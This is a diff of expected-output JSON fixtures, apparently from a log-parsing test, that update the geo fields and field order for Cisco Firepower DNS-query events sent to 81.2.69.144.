"continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -793,15 +757,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -840,7 +804,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096928100Z", + "ingested": "2021-12-14T14:37:39.593553336Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59714, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 658", "code": "430003", "kind": "event", 
@@ -903,37 +867,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", @@ -942,15 +900,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -989,7 +947,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096934500Z", + "ingested": "2021-12-14T14:37:39.593553740Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Non-Existent Domain, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -1055,37 +1013,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -1094,15 +1046,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1141,7 +1093,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096940100Z", + "ingested": "2021-12-14T14:37:39.593554068Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", 
@@ -1204,37 +1156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "SERVFAIL" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "SERVFAIL" }, "source": { "address": "10.0.1.20", @@ -1243,15 +1189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1290,7 +1236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096946300Z", + "ingested": "2021-12-14T14:37:39.593554416Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSResponseType: Server Failure, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -1354,37 +1300,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "TXT" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 722, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "TXT" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -1393,15 +1333,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1440,7 +1380,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096952400Z", + "ingested": "2021-12-14T14:37:39.593554749Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 58082, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 722, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: text strings, DNS_TTL: 299", "code": "430003", "kind": "event", 
@@ -1505,37 +1445,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "refusedthis.com", - "type": "A" - }, - "response_code": "REFUSED" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 75, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "refusedthis.com", + "type": "A" + }, + "response_code": "REFUSED" }, "source": { "address": "10.0.1.20", @@ -1544,15 +1478,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1591,7 +1525,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096958500Z", + "ingested": "2021-12-14T14:37:39.593578654Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 33973, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 98, ResponderBytes: 75, NAPPolicy: Balanced Security and Connectivity, DNSQuery: refusedthis.com, DNSRecordType: a host address, DNSResponseType: Query Refused", "code": "430003", "kind": "event", @@ -1654,33 +1588,27 @@ "log": { "level": "alert" }, + "dns": { + "response_code": "SERVFAIL" + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 313, - "ip": "81.2.69.144", - "packets": 4 - }, - "dns": { - "response_code": "SERVFAIL" + "packets": 4, + "ip": "81.2.69.144" }, "source": { "address": "10.0.1.20", @@ -1689,15 +1617,15 @@ "packets": 6, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "tcp", "application": "dns client", "iana_number": "6" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -1736,7 +1664,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096965100Z", + "ingested": "2021-12-14T14:37:39.593580185Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 39541, DstPort: 53, Protocol: tcp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 6, ResponderPackets: 4, InitiatorBytes: 457, ResponderBytes: 313, NAPPolicy: Balanced Security and Connectivity, DNSResponseType: Server Failure", "code": "430003", "kind": "event", @@ -1797,37 +1725,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "laskdfjlaksdf.elastic.co", - "type": "A" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 180, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "laskdfjlaksdf.elastic.co", + "type": "A" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", 
@@ -1836,15 +1758,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -1883,7 +1805,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096971200Z", + "ingested": "2021-12-14T14:37:39.593580575Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 41672, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 107, ResponderBytes: 180, NAPPolicy: Balanced Security and Connectivity, DNSQuery: laskdfjlaksdf.elastic.co, DNSRecordType: a host address, DNSResponseType: Non-Existent Domain, DNS_TTL: 900", "code": "430003", "kind": "event", 
@@ -1947,37 +1869,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "ns-1168.awsdns-18.org", - "type": "A" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 108, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "ns-1168.awsdns-18.org", + "type": "A" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -1986,15 +1902,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -2033,7 +1949,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096977300Z", + "ingested": "2021-12-14T14:37:39.593580919Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 59577, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 104, ResponderBytes: 108, NAPPolicy: Balanced Security and Connectivity, DNSQuery: ns-1168.awsdns-18.org, DNSRecordType: a host address, DNS_TTL: 31694", "code": "430003", "kind": "event", @@ -2096,37 +2012,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "_http._tcp.security.ubuntu.com", - "type": "SRV" - }, - "response_code": "NXDOMAIN" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 162, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "_http._tcp.security.ubuntu.com", + "type": "SRV" + }, + "response_code": "NXDOMAIN" }, "source": { "address": "10.0.1.20", 
@@ -2135,15 +2045,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2182,7 +2092,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096983500Z", + "ingested": "2021-12-14T14:37:39.593581252Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 35998, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 101, ResponderBytes: 162, NAPPolicy: Balanced Security and Connectivity, DNSQuery: _http._tcp.security.ubuntu.com, DNSRecordType: Server Selection, DNSResponseType: Non-Existent Domain, DNS_TTL: 946", "code": "430003", "kind": "event", 
@@ -2246,37 +2156,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "MX" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 199, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "MX" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2285,15 +2189,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -2332,7 +2236,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096989700Z", + "ingested": "2021-12-14T14:37:39.593581586Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, AccessControlRuleReason: Intrusion Monitor, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 55105, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, IPSCount: 1, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 199, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: mail exchange, DNS_TTL: 299", "code": "430003", "kind": "event", @@ -2397,37 +2301,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "SOA" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "SOA" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -2436,15 +2334,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2483,7 +2381,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.096996Z", + "ingested": "2021-12-14T14:37:39.593582019Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 47260, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: marks the start of a zone of authority, DNS_TTL: 899", "code": "430003", "kind": "event", 
@@ -2546,37 +2444,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "CNAME" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 166, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "CNAME" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2585,15 +2477,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { 
@@ -2632,7 +2524,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097002100Z", + "ingested": "2021-12-14T14:37:39.593582355Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 53033, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 166, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: the canonical name for an alias, DNS_TTL: 899", "code": "430003", "kind": "event", @@ -2695,37 +2587,31 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "name": "elastic.co", - "type": "NS" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 221, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "name": "elastic.co", + "type": "NS" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", 
@@ -2734,15 +2620,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": "udp", "application": "dns client", "iana_number": "17" }, + "tags": [ + "preserve_original_event" + ], "observer": { "ingress": { "interface": { @@ -2781,7 +2667,7 @@ "event": { "severity": 1, "duration": 0, - "ingested": "2021-12-09T13:32:56.097006900Z", + "ingested": "2021-12-14T14:37:39.593582687Z", "original": "2019-08-26T23:11:03Z siem-ftd %FTD-1-430003: AccessControlRuleAction: Allow, SrcIP: 10.0.1.20, DstIP: 81.2.69.144, SrcPort: 57141, DstPort: 53, Protocol: udp, IngressInterface: inside, EgressInterface: outside, IngressZone: input-zone, EgressZone: output-zone, ACPolicy: default, AccessControlRuleName: Intrusion-Rule, Prefilter Policy: Default Prefilter Policy, User: No Authentication Required, Client: DNS client, ApplicationProtocol: DNS, ConnectionDuration: 0, InitiatorPackets: 1, ResponderPackets: 1, InitiatorBytes: 93, ResponderBytes: 221, NAPPolicy: Balanced Security and Connectivity, DNSQuery: elastic.co, DNSRecordType: an authoritative name server, DNS_TTL: 21599", "code": "430003", "kind": "event", 
@@ -2844,36 +2730,30 @@ "log": { "level": "alert" }, - "dns": { - "question": { - "type": "PTR" - }, - "response_code": "NOERROR" - }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", "port": 53, "bytes": 131, - "ip": "81.2.69.144", - "packets": 1 + "packets": 1, + "ip": "81.2.69.144" + }, + "dns": { + "question": { + "type": "PTR" + }, + "response_code": "NOERROR" }, "source": { "address": "10.0.1.20", @@ -2882,15 +2762,15 @@ "packets": 1, "ip": "10.0.1.20" }, - "tags": [ - "preserve_original_event" - ], "network": { "protocol": "dns", "transport": 